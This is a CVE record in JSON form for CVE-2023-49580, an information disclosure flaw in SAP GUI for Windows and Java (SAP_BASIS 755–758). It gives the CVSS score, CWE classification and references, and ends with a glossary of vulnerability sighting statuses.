{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-02T22:01:25.577Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3385711", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP GUI for Windows and SAP GUI for Java", vendor: "SAP_SE", versions: [ { status: "affected", version: "SAP_BASIS 755", }, { status: "affected", version: "SAP_BASIS 756", }, { status: "affected", version: "SAP_BASIS 757", }, { status: "affected", version: "SAP_BASIS 758", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.</p>", }, ], value: "SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. 
also increasing the response times of the AS ABAP.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-732", description: "CWE-732: Incorrect Permission Assignment for Critical Resource", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-09-28T22:14:46.907Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3385711", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Information disclosure in SAP GUI for Windows and SAP GUI for Java", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2023-49580", datePublished: "2023-12-12T01:09:55.716Z", dateReserved: "2023-11-27T18:07:40.886Z", dateUpdated: "2024-09-28T22:14:46.907Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
Sightings
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.